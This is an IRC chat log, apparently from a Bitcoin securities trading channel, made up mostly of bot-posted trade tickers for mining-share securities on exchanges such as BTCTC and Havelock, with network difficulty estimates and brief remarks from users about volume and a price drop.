[TAT.ASICMINER] 1 @ 0.025 BTC [-] Aug 24 18:26:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Aug 24 18:26:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Aug 24 18:26:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Aug 24 18:26:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Aug 24 18:26:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [-] Aug 24 18:26:10 [BTCTC] [TAT.ASICMINER] 55 @ 0.025 = 1.375 BTC [-] Aug 24 18:26:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.025 = 0.5 BTC [-] Aug 24 18:26:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Aug 24 18:26:52 [HAVELOCK] [AM1] 2 @ 2.6 = 5.2 BTC [-] Aug 24 18:27:17 [BTCTC] [LABCOIN] 375 @ 0.002989 = 1.1209 BTC [+] Aug 24 18:27:37 .d Aug 24 18:27:38 65750060.14908 | Next Diff in 2007 blocks | Estimated Change: -0.5891% in 14d 0h 22m 34s Aug 24 18:28:14 [BTCTC] [DMS.MINING] 10 @ 0.00346 = 0.0346 BTC [+] Aug 24 18:28:15 [BTCTC] [DMS.MINING] 20 @ 0.003426 = 0.0685 BTC [-] Aug 24 18:28:17 [BTCTC] [DMS.MINING] 5 @ 0.003425 = 0.0171 BTC [-] Aug 24 18:28:18 [BTCTC] [DMS.MINING] 17 @ 0.00342 = 0.0581 BTC [-] Aug 24 18:28:18 [BTCTC] [DMS.MINING] 40 @ 0.003405 = 0.1362 BTC [-] Aug 24 18:28:19 [BTCTC] [DMS.MINING] 200 @ 0.003403 = 0.6806 BTC [-] Aug 24 18:28:20 [BTCTC] [DMS.MINING] 8 @ 0.0034 = 0.0272 BTC [-] Aug 24 18:28:55 [BTCTC] [DMS.MINING] 22 @ 0.00335 = 0.0737 BTC [-] Aug 24 18:28:56 [BTCTC] [DMS.MINING] 6 @ 0.0033 = 0.0198 BTC [-] Aug 24 18:28:58 [BTCTC] [DMS.MINING] 31 @ 0.0033 = 0.1023 BTC [-] Aug 24 18:29:11 [BTCTC] [TAT.ASICMINER] 67 @ 0.02672 = 1.7902 BTC [+] Aug 24 18:31:07 [BTCTC] [LABCOIN] 3 @ 0.002989 = 0.009 BTC [+] Aug 24 18:31:07 ;;estimate Aug 24 18:31:08 Next difficulty estimate | 81470937.0983 based on data since last change | 72484113.254 based on data for last three days Aug 24 18:31:56 [HAVELOCK] [VTX] 1 @ 0.58 BTC [-] Aug 24 18:32:01 [BTCTC] [ASICMINER-PT] 10 @ 2.553 = 25.53 BTC [+] Aug 24 18:32:19 [HAVELOCK] [XBOND] 116 @ 0.0011689 = 0.1356 BTC [-] Aug 24 18:32:43 [BTCTC] [LABCOIN] 250 @ 0.002989 = 0.7473 BTC [+] Aug 24 18:32:44 [BTCTC] [LABCOIN] 1250 @ 0.00299 = 3.7375 BTC [+] Aug 24 18:33:10 [BTCTC] [TAT.ASICMINER] 67 @ 0.02522 = 1.6897 BTC [-] Aug 24 18:33:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02521 BTC [-] Aug 24 18:33:13 [BTCTC] [TAT.ASICMINER] 33 @ 0.0252 = 0.8316 BTC [-] Aug 24 18:33:14 [BTCTC] [TAT.ASICMINER] 17 @ 0.025 = 0.425 BTC [-] Aug 24 18:33:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0241 BTC [-] Aug 24 18:35:23 [BTCTC] [ASICMINER-PT] 10 @ 2.55 = 25.5 BTC [-] Aug 24 18:35:25 [BTCTC] [LABCOIN] 85 @ 0.002904 = 0.2468 BTC [-] Aug 24 18:35:26 [BTCTC] [LABCOIN] 20 @ 0.002903 = 0.0581 BTC [-] Aug 24 18:35:26 [BTCTC] [ASICMINER-PT] 3 @ 2.521 = 7.563 BTC [-] Aug 24 18:35:26 [BTCTC] [LABCOIN] 125 @ 0.002901 = 0.3626 BTC [-] Aug 24 18:35:27 [BTCTC] [ASICMINER-PT] 1 @ 2.521 BTC [-] Aug 24 18:35:31 [BTCTC] [LABCOIN] 200 @ 0.0029 = 0.58 BTC [-] Aug 24 18:35:31 [BTCTC] [ASICMINER-PT] 15 @ 2.52 = 37.8 BTC [-] Aug 24 18:35:42 [BTCTC] [LABCOIN] 19 @ 0.0029 = 0.0551 BTC [-] Aug 24 18:36:00 [BTCTC] [LABCOIN] 300 @ 0.002899 = 0.8697 BTC [-] Aug 24 18:36:20 [HAVELOCK] [AM1] 1 @ 2.52 BTC [-] Aug 24 18:36:23 [HAVELOCK] [AM1] 3 @ 2.5121 = 7.5363 BTC [-] Aug 24 18:36:50 .d Aug 24 18:36:51 65750060.14908 | Next Diff in 2007 blocks | Estimated Change: -0.5891% in 14d 0h 13m 20s Aug 24 18:36:51 d. Aug 24 18:39:14 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [-] Aug 24 18:40:31 [HAVELOCK] [AM1] 1 @ 2.455 BTC [-] Aug 24 18:40:55 [HAVELOCK] [XBOND] 2100 @ 0.0011689 = 2.4547 BTC [-] Aug 24 18:41:06 [MPEX] [S.MPOE] 2650 @ 0.00083009 = 2.1997 BTC [+] Aug 24 18:42:14 [HAVELOCK] [XBOND] 25 @ 0.0011689 = 0.0292 BTC [-] Aug 24 18:42:32 [BTCTC] [TAT.ASICMINER] 300 @ 0.025 = 7.5 BTC [+] Aug 24 18:43:35 [BTCTC] [ACTIVEMINING] 32 @ 0.005594 = 0.179 BTC [+] Aug 24 18:45:05 [BTCTC] [LABCOIN] 30 @ 0.002899 = 0.087 BTC [-] Aug 24 18:45:20 [BTCTC] [COG.F] 1 @ 4.5 BTC [+] Aug 24 18:45:41 [BTCTC] [LABCOIN] 146 @ 0.002899 = 0.4233 BTC [-] Aug 24 18:45:42 [BTCTC] [LABCOIN] 1910 @ 0.0029 = 5.539 BTC [+] Aug 24 18:45:43 [BTCTC] [LABCOIN] 19 @ 0.002988 = 0.0568 BTC [+] Aug 24 18:45:44 [BTCTC] [LABCOIN] 4000 @ 0.002989 = 11.956 BTC [+] Aug 24 18:45:46 [BTCTC] [LABCOIN] 750 @ 0.00299 = 2.2425 BTC [+] Aug 24 18:45:47 [BTCTC] [LABCOIN] 9052 @ 0.002998 = 27.1379 BTC [+] Aug 24 18:45:47 [BTCTC] [LABCOIN] 1999 @ 0.002999 = 5.995 BTC [+] Aug 24 18:45:48 [BTCTC] [LABCOIN] 2000 @ 0.002999 = 5.998 BTC [+] Aug 24 18:45:49 [BTCTC] [LABCOIN] 9724 @ 0.003 = 29.172 BTC [+] Aug 24 18:48:10 [BTCTC] [ACTIVEMINING] 1 @ 0.005593 BTC [-] Aug 24 18:48:11 [BTCTC] [ACTIVEMINING] 1 @ 0.005593 BTC [-] Aug 24 18:48:12 [BTCTC] [ACTIVEMINING] 1 @ 0.005591 BTC [-] Aug 24 18:48:14 [BTCTC] [ACTIVEMINING] 1 @ 0.00559 BTC [-] Aug 24 18:48:28 [BTCTC] [BTC-TRADING-PT] 50 @ 1.1 = 55 BTC [+] Aug 24 18:48:43 [BTCTC] [LABCOIN] 85 @ 0.002996 = 0.2547 BTC [-] Aug 24 18:48:44 [BTCTC] [LABCOIN] 65 @ 0.002997 = 0.1948 BTC [+] Aug 24 18:48:55 [HAVELOCK] [HIM] 1 @ 0.205 BTC [-] Aug 24 18:49:32 [BTCTC] [RSM] 7 @ 0.0121 = 0.0847 BTC [+] Aug 24 18:51:03 [BTCTC] [BFMINES] 225 @ 0.002001 = 0.4502 BTC [-] Aug 24 18:51:51 [BTCTC] [ACTIVEMINING] 68 @ 0.005344 = 0.3634 BTC [-] Aug 24 18:55:11 [BTCTC] [MININGCO.ETF] 3 @ 0.1167 = 0.3501 BTC [-] Aug 24 18:55:46 [BTCTC] [BASIC-MINING] 5 @ 0.246 = 1.23 BTC [-] Aug 24 18:56:20 [BTCTC] [ACTIVEMINING] 8 @ 0.005345 = 0.0428 BTC [+] Aug 24 18:56:23 [BTCTC] [ACTIVEMINING] 24 @ 0.005344 = 0.1283 BTC [-] Aug 24 18:57:12 [BTCTC] [ASICMINER-PT] 6 @ 2.55 = 15.3 BTC [+] Aug 24 18:59:14 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [+] Aug 24 18:59:44 [BTCTC] [DMS.MINING] 5 @ 0.003589 = 0.0179 BTC [+] Aug 24 19:00:11 [BTCTC] [NASTY-PT] 1 @ 0.003432 BTC [+] Aug 24 19:00:23 [BTCTC] [ASICMINER-PT] 1 @ 2.597 BTC [+] Aug 24 19:00:43 [BTCTC] [ACTIVEMINING] 4 @ 0.005345 = 0.0214 BTC [+] Aug 24 19:00:44 [BTCTC] [ACTIVEMINING] 2 @ 0.005344 = 0.0107 BTC [-] Aug 24 19:00:45 [BTCTC] [ACTIVEMINING] 5 @ 0.00534 = 0.0267 BTC [-] Aug 24 19:00:47 [BTCTC] [ACTIVEMINING] 299 @ 0.005303 = 1.5856 BTC [-] Aug 24 19:00:48 [BTCTC] [ACTIVEMINING] 190 @ 0.005302 = 1.0074 BTC [-] Aug 24 19:01:12 [BTCTC] [NASTY-PT] 30 @ 0.003433 = 0.103 BTC [+] Aug 24 19:01:17 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [-] Aug 24 19:01:19 [BTCTC] [ASICMINER-PT] 5 @ 2.55 = 12.75 BTC [-] Aug 24 19:01:20 [BTCTC] [ASICMINER-PT] 8 @ 2.54 = 20.32 BTC [-] Aug 24 19:01:21 [BTCTC] [ASICMINER-PT] 5 @ 2.52 = 12.6 BTC [-] Aug 24 19:01:22 [BTCTC] [ASICMINER-PT] 1 @ 2.515 BTC [-] Aug 24 19:01:23 [BTCTC] [ASICMINER-PT] 1 @ 2.515 BTC [-] Aug 24 19:01:24 [BTCTC] [ASICMINER-PT] 10 @ 2.514 = 25.14 BTC [-] Aug 24 19:01:25 [BTCTC] [ASICMINER-PT] 2 @ 2.513 = 5.026 BTC [-] Aug 24 19:01:26 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 24 19:01:27 [BTCTC] [ASICMINER-PT] 5 @ 2.51 = 12.55 BTC [-] Aug 24 19:01:28 [BTCTC] [ASICMINER-PT] 7 @ 2.506 = 17.542 BTC [-] Aug 24 19:01:30 [BTCTC] [ASICMINER-PT] 8 @ 2.505 = 20.04 BTC [-] Aug 24 19:01:31 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] Aug 24 19:01:32 [BTCTC] [ASICMINER-PT] 5 @ 2.502 = 12.51 BTC [-] Aug 24 19:01:33 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] Aug 24 19:01:35 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 24 19:01:35 [BTCTC] [ASICMINER-PT] 21 @ 2.501 = 52.521 BTC [-] Aug 24 19:01:36 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 24 19:01:37 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 24 19:01:38 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [-] Aug 24 19:01:40 [BTCTC] [ASICMINER-PT] 10 @ 2.5 = 25 BTC [-] Aug 24 19:01:41 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 24 19:01:42 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [-] Aug 24 19:01:44 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 24 19:01:52 [BTCTC] [DMS.MINING] 1 @ 0.003588 BTC [-] Aug 24 19:02:35 [BTCTC] [LABCOIN] 1 @ 0.002991 BTC [-] Aug 24 19:02:35 [BTCTC] [LABCOIN] 20 @ 0.002992 = 0.0598 BTC [+] Aug 24 19:02:37 [BTCTC] [LABCOIN] 289 @ 0.002999 = 0.8667 BTC [+] Aug 24 19:03:46 [BTCTC] [ASICMINER-PT] 1 @ 2.498 BTC [-] Aug 24 19:04:15 [BTCTC] [LABCOIN] 1000 @ 0.002999 = 2.999 BTC [+] Aug 24 19:07:11 [HAVELOCK] [LABCO] 20 @ 0.0027 = 0.054 BTC [-] Aug 24 19:07:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.02585 BTC [+] Aug 24 19:08:46 [BTCTC] [DMS.SELLING] 100 @ 0.01699 = 1.699 BTC [+] Aug 24 19:09:00 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Aug 24 19:09:02 [BTCTC] [ASICMINER-PT] 1 @ 2.491 BTC [-] Aug 24 19:09:03 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Aug 24 19:09:04 [BTCTC] [ASICMINER-PT] 4 @ 2.47 = 9.88 BTC [-] Aug 24 19:09:05 [BTCTC] [ASICMINER-PT] 3 @ 2.452 = 7.356 BTC [-] Aug 24 19:09:46 [BTCTC] [DMS.SELLING] 42 @ 0.01699 = 0.7136 BTC [+] Aug 24 19:10:43 [BTCTC] [DMS.MINING] 1 @ 0.003569 BTC [-] Aug 24 19:11:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000976 BTC [+] Aug 24 19:12:06 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] Aug 24 19:12:07 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Aug 24 19:12:09 [BTCTC] [ASICMINER-PT] 1 @ 2.452 BTC [-] Aug 24 19:12:10 [BTCTC] [ASICMINER-PT] 3 @ 2.45 = 7.35 BTC [-] Aug 24 19:12:11 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] Aug 24 19:12:26 [BTCTC] [TAT.ASICMINER] 34 @ 0.0243 = 0.8262 BTC [-] Aug 24 19:12:35 [BTCTC] [TAT.ASICMINER] 27 @ 0.0243 = 0.6561 BTC [-] Aug 24 19:13:18 [BTCTC] [TAT.ASICMINER] 46 @ 0.0242 = 1.1132 BTC [-] Aug 24 19:13:18 [BTCTC] [TAT.ASICMINER] 49 @ 0.0241 = 1.1809 BTC [-] Aug 24 19:13:20 [BTCTC] [TAT.ASICMINER] 15 @ 0.0241 = 0.3615 BTC [-] Aug 24 19:13:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.02401 = 0.1201 BTC [-] Aug 24 19:13:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.02401 = 0.048 BTC [-] Aug 24 19:13:24 [BTCTC] [TAT.ASICMINER] 25 @ 0.02401 = 0.6003 BTC [-] Aug 24 19:13:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.024 = 0.192 BTC [-] Aug 24 19:13:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] Aug 24 19:13:28 [BTCTC] [TAT.ASICMINER] 60 @ 0.024 = 1.44 BTC [-] Aug 24 19:13:29 [BTCTC] [TAT.ASICMINER] 7 @ 0.024 = 0.168 BTC [-] Aug 24 19:13:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0233 BTC [-] Aug 24 19:13:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.02429 = 0.1215 BTC [+] Aug 24 19:13:41 [BTCTC] [DMS.MINING] 20 @ 0.003336 = 0.0667 BTC [-] Aug 24 19:13:43 [BTCTC] [ASICMINER-PT] 1 @ 2.414 BTC [-] Aug 24 19:13:44 [BTCTC] [DMS.MINING] 5 @ 0.003335 = 0.0167 BTC [-] Aug 24 19:13:51 [HAVELOCK] [AM100] 2 @ 0.0261 = 0.0522 BTC [+] Aug 24 19:15:13 [BTCTC] [DMS.MINING] 58 @ 0.00333 = 0.1931 BTC [-] Aug 24 19:15:14 [BTCTC] [DMS.MINING] 20 @ 0.003485 = 0.0697 BTC [+] Aug 24 19:15:16 [BTCTC] [DMS.MINING] 9 @ 0.003567 = 0.0321 BTC [+] Aug 24 19:15:17 [BTCTC] [DMS.MINING] 20 @ 0.003568 = 0.0714 BTC [+] Aug 24 19:15:18 [BTCTC] [DMS.MINING] 46 @ 0.003568 = 0.1641 BTC [+] Aug 24 19:15:19 [BTCTC] [DMS.MINING] 30 @ 0.003635 = 0.1091 BTC [+] Aug 24 19:15:19 [BTCTC] [DMS.MINING] 40 @ 0.003638 = 0.1455 BTC [+] Aug 24 19:15:20 [BTCTC] [DMS.MINING] 30 @ 0.003744 = 0.1123 BTC [+] Aug 24 19:15:21 [BTCTC] [DMS.MINING] 97 @ 0.00375 = 0.3638 BTC [+] Aug 24 19:15:28 [BTCTC] [ASICMINER-PT] 1 @ 2.412 BTC [-] Aug 24 19:15:29 [BTCTC] [ASICMINER-PT] 1 @ 2.411 BTC [-] Aug 24 19:15:31 [BTCTC] [ASICMINER-PT] 3 @ 2.411 = 7.233 BTC [-] Aug 24 19:16:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02331 BTC [-] Aug 24 19:17:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02331 BTC [-] Aug 24 19:17:25 [HAVELOCK] [AM100] 35 @ 0.02360001 = 0.826 BTC [-] Aug 24 19:17:28 [HAVELOCK] [AM100] 1 @ 0.02352 BTC [-] Aug 24 19:17:30 [HAVELOCK] [AM100] 25 @ 0.02351 = 0.5878 BTC [-] Aug 24 19:17:31 [HAVELOCK] [AM100] 39 @ 0.02350001 = 0.9165 BTC [-] Aug 24 19:17:37 [HAVELOCK] [AM100] 2 @ 0.0237 = 0.0474 BTC [+] Aug 24 19:17:40 [HAVELOCK] [AM100] 23 @ 0.02350001 = 0.5405 BTC [-] Aug 24 19:17:42 [HAVELOCK] [AM100] 1 @ 0.0232002 BTC [-] Aug 24 19:17:44 [HAVELOCK] [AM100] 19 @ 0.02320001 = 0.4408 BTC [-] Aug 24 19:17:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.0233 = 0.1864 BTC [-] Aug 24 19:18:58 [BTCTC] [TAT.ASICMINER] 41 @ 0.02331 = 0.9557 BTC [+] Aug 24 19:19:01 [BTCTC] [TAT.ASICMINER] 99 @ 0.0233 = 2.3067 BTC [-] Aug 24 19:19:03 [BTCTC] [TAT.ASICMINER] 70 @ 0.0233 = 1.631 BTC [-] Aug 24 19:19:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.023 = 0.23 BTC [-] Aug 24 19:19:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02251 BTC [-] Aug 24 19:19:13 [BTCTC] [BASIC-MINING] 1 @ 0.2461 BTC [+] Aug 24 19:19:31 [BTCTC] [LABCOIN] 21 @ 0.002992 = 0.0628 BTC [-] Aug 24 19:19:33 [BTCTC] [LABCOIN] 27 @ 0.002909 = 0.0785 BTC [-] Aug 24 19:19:34 [BTCTC] [LABCOIN] 20 @ 0.002908 = 0.0582 BTC [-] Aug 24 19:19:35 [BTCTC] [LABCOIN] 90 @ 0.002906 = 0.2615 BTC [-] Aug 24 19:19:36 [BTCTC] [LABCOIN] 843 @ 0.002892 = 2.438 BTC [-] Aug 24 19:19:37 [HAVELOCK] [CFIG] 1 @ 0.143 BTC [-] Aug 24 19:19:40 [BTCTC] [LABCOIN] 1566 @ 0.002891 = 4.5273 BTC [-] Aug 24 19:19:41 [BTCTC] [LABCOIN] 1988 @ 0.00289 = 5.7453 BTC [-] Aug 24 19:19:47 [HAVELOCK] [CFIG] 1 @ 0.1420001 BTC [-] Aug 24 19:19:54 [HAVELOCK] [CFIG] 1 @ 0.14200001 BTC [-] Aug 24 19:20:04 [BTCTC] [ASICMINER-PT] 1 @ 2.415 BTC [+] Aug 24 19:20:06 [BTCTC] [ASICMINER-PT] 2 @ 2.415 = 4.83 BTC [+] Aug 24 19:20:07 [BTCTC] [ASICMINER-PT] 10 @ 2.411 = 24.11 BTC [-] Aug 24 19:20:08 [HAVELOCK] [AM100] 1 @ 0.02160001 BTC [-] Aug 24 19:20:10 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] Aug 24 19:20:11 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] Aug 24 19:20:13 [BTCTC] [ASICMINER-PT] 1 @ 2.409 BTC [-] Aug 24 19:20:14 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [-] Aug 24 19:20:15 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] Aug 24 19:20:15 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] Aug 24 19:20:16 [BTCTC] [ASICMINER-PT] 10 @ 2.4 = 24 BTC [-] Aug 24 19:20:17 [BTCTC] [ASICMINER-PT] 5 @ 2.4 = 12 BTC [-] Aug 24 19:20:18 [BTCTC] [ASICMINER-PT] 4 @ 2.38 = 9.52 BTC [-] Aug 24 19:20:36 [BTCTC] [TAT.MINIGAME] 172 @ 0.000241 = 0.0415 BTC [-] Aug 24 19:20:41 [HAVELOCK] [AM1] 5 @ 2.30011 = 11.5006 BTC [-] Aug 24 19:20:44 [HAVELOCK] [AM1] 1 @ 2.3001 BTC [-] Aug 24 19:21:26 ystarnaud i hope you took that 2.3 ? Aug 24 19:21:55 [BTCTC] [BTC-BOND] 3 @ 0.0099 = 0.0297 BTC [-] Aug 24 19:21:57 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [-] Aug 24 19:21:58 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [-] Aug 24 19:22:05 [BTCTC] [DMS.MINING] 3 @ 0.003749 = 0.0112 BTC [-] Aug 24 19:22:27 hehe Aug 24 19:22:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1961 BTC [+] Aug 24 19:22:53 [BTCTC] [DMS.MINING] 1 @ 0.003749 BTC [-] Aug 24 19:23:40 [BTCTC] [LABCOIN] 7 @ 0.002896 = 0.0203 BTC [+] Aug 24 19:23:46 get this Aug 24 19:23:51 30-day volume on BTCT Aug 24 19:23:53 154,584.28 btc Aug 24 19:24:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.02252 = 0.0676 BTC [+] Aug 24 19:24:26 [BTCTC] [DMS.MINING] 13 @ 0.003749 = 0.0487 BTC [-] Aug 24 19:25:39 [BTCTC] [BTC-TRADING-PT] 76 @ 1.125 = 85.5 BTC [+] Aug 24 19:26:04 [BTCTC] [BTC-TRADING-PT] 1 @ 1.17 BTC [+] Aug 24 19:26:18 [BTCTC] [DMS.MINING] 3 @ 0.003749 = 0.0112 BTC [-] Aug 24 19:27:22 [BTCTC] [DMS.MINING] 35 @ 0.003749 = 0.1312 BTC [-] Aug 24 19:27:24 [BTCTC] [DMS.MINING] 15 @ 0.003749 = 0.0562 BTC [-] Aug 24 19:27:25 [BTCTC] [DMS.MINING] 3 @ 0.00375 = 0.0113 BTC [+] Aug 24 19:27:25 [BTCTC] [DMS.MINING] 27 @ 0.003775 = 0.1019 BTC [+] Aug 24 19:27:52 [BTCTC] [RSM] 3 @ 0.0121 = 0.0363 BTC [+] Aug 24 19:28:40 [BTCTC] [RSM] 7 @ 0.01248 = 0.0874 BTC [+] Aug 24 19:30:11 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [-] Aug 24 19:31:21 [BTCTC] [ASICMINER-PT] 2 @ 2.36 = 4.72 BTC [-] Aug 24 19:32:56 [BTCTC] [DMS.MINING] 33 @ 0.003775 = 0.1246 BTC [+] Aug 24 19:33:20 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.000972 = 0.0156 BTC [-] Aug 24 19:33:54 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [-] Aug 24 19:33:55 [BTCTC] [ASICMINER-PT] 1 @ 2.35 BTC [-] Aug 24 19:33:57 [BTCTC] [ASICMINER-PT] 1 @ 2.33 BTC [-] Aug 24 19:33:58 [BTCTC] [ASICMINER-PT] 7 @ 2.32 = 16.24 BTC [-] Aug 24 19:33:59 [BTCTC] [ASICMINER-PT] 1 @ 2.316 BTC [-] Aug 24 19:33:59 [BTCTC] [ASICMINER-PT] 1 @ 2.315 BTC [-] Aug 24 19:34:02 [BTCTC] [ASICMINER-PT] 1 @ 2.312 BTC [-] Aug 24 19:34:02 [BTCTC] [ASICMINER-PT] 1 @ 2.312 BTC [-] Aug 24 19:34:03 [BTCTC] [ASICMINER-PT] 1 @ 2.311 BTC [-] Aug 24 19:34:04 [BTCTC] [ASICMINER-PT] 2 @ 2.31 = 4.62 BTC [-] Aug 24 19:34:06 [BTCTC] [ASICMINER-PT] 2 @ 2.31 = 4.62 BTC [-] Aug 24 19:34:07 [BTCTC] [ASICMINER-PT] 2 @ 2.31 = 4.62 BTC [-] Aug 24 19:34:08 [BTCTC] [ASICMINER-PT] 10 @ 2.31 = 23.1 BTC [-] Aug 24 19:34:09 [BTCTC] [ASICMINER-PT] 8 @ 2.305 = 18.44 BTC [-] Aug 24 19:34:10 [BTCTC] [ASICMINER-PT] 1 @ 2.304 BTC [-] Aug 24 19:34:10 [BTCTC] [ASICMINER-PT] 8 @ 2.302 = 18.416 BTC [-] Aug 24 19:34:11 [BTCTC] [ASICMINER-PT] 2 @ 2.301 = 4.602 BTC [-] Aug 24 19:35:28 [BTCTC] [ASICMINER-PT] 8 @ 2.301 = 18.408 BTC [-] Aug 24 19:35:29 [BTCTC] [ASICMINER-PT] 10 @ 2.3 = 23 BTC [-] Aug 24 19:35:31 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Aug 24 19:35:32 [BTCTC] [ASICMINER-PT] 2 @ 2.3 = 4.6 BTC [-] Aug 24 19:35:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.02256 = 0.0451 BTC [+] Aug 24 19:35:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.02255 = 0.0451 BTC [-] Aug 24 19:36:09 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Aug 24 19:37:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.02255 BTC [-] Aug 24 19:37:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.02254 = 0.2254 BTC [-] Aug 24 19:37:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02253 BTC [-] Aug 24 19:37:05 [BTCTC] [TAT.ASICMINER] 11 @ 0.02253 = 0.2478 BTC [-] Aug 24 19:37:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02252 BTC [-] Aug 24 19:37:07 [BTCTC] [TAT.ASICMINER] 67 @ 0.02252 = 1.5088 BTC [-] Aug 24 19:37:08 [BTCTC] [TAT.ASICMINER] 19 @ 0.02251 = 0.4277 BTC [-] Aug 24 19:37:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.02251 BTC [-] Aug 24 19:37:11 [BTCTC] [TAT.ASICMINER] 30 @ 0.0225 = 0.675 BTC [-] Aug 24 19:37:12 [BTCTC] [TAT.ASICMINER] 500 @ 0.0225 = 11.25 BTC [-] Aug 24 19:37:13 [BTCTC] [TAT.ASICMINER] 30 @ 0.02249 = 0.6747 BTC [-] Aug 24 19:37:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.022 BTC [-] Aug 24 19:37:27 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Aug 24 19:37:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.02254 = 1.127 BTC [+] Aug 24 19:38:03 [BTCTC] [BASIC-MINING] 1 @ 0.247 BTC [+] Aug 24 19:41:07 [BTCTC] [ACTIVEMINING] 4 @ 0.005311 = 0.0212 BTC [+] Aug 24 19:41:09 [BTCTC] [LABCOIN] 1671 @ 0.00289 = 4.8292 BTC [-] Aug 24 19:42:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02253 BTC [-] Aug 24 19:42:37 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Aug 24 19:42:42 ThickAsThieves that's about what glbse had last summer. Aug 24 19:43:32 [BTCTC] [BASIC-MINING] 1 @ 0.246 BTC [-] Aug 24 19:43:46 [BTCTC] [TAT.ASICMINER] 26 @ 0.02253 = 0.5858 BTC [-] Aug 24 19:44:21 [BTCTC] [RSM] 3 @ 0.01248 = 0.0374 BTC [+] Aug 24 19:44:23 [BTCTC] [BASIC-MINING] 1 @ 0.2452 BTC [-] Aug 24 19:44:27 [BTCTC] [RSM] 10 @ 0.01248 = 0.1248 BTC [+] Aug 24 19:44:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.02255 BTC [+] Aug 24 19:45:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.02354 = 0.0471 BTC [+] Aug 24 19:45:11 [BTCTC] [TAT.ASICMINER] 9 @ 0.02355 = 0.212 BTC [+] Aug 24 19:45:14 [BTCTC] [BASIC-MINING] 1 @ 0.2451 BTC [-] Aug 24 19:45:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.02354 = 0.0471 BTC [-] Aug 24 19:45:35 [BTCTC] [RSM] 1 @ 0.01249 BTC [+] Aug 24 19:45:37 [BTCTC] [RSM] 26 @ 0.0125 = 0.325 BTC [+] Aug 24 19:46:27 Already at 2.25 I see Aug 24 19:46:53 [BTCTC] [DMS.SELLING] 500 @ 0.0167 = 8.35 BTC [-] Aug 24 19:47:05 pretty epic fall in a short time Aug 24 19:48:17 [BTCTC] [TAT.ASICMINER] 23 @ 0.0235 = 0.5405 BTC [-] Aug 24 19:48:44 [BTCTC] [DMS.SELLING] 100 @ 0.0165 = 1.65 BTC [-] Aug 24 19:49:11 [BTCTC] [BTC-GROWTH] 1 @ 0.104 BTC [+] Aug 24 19:49:45 [BTCTC] [TAT.ASICMINER] 41 @ 0.02301 = 0.9434 BTC [-] Aug 24 19:50:06 [HAVELOCK] [AM100] 25 @ 0.023 = 0.575 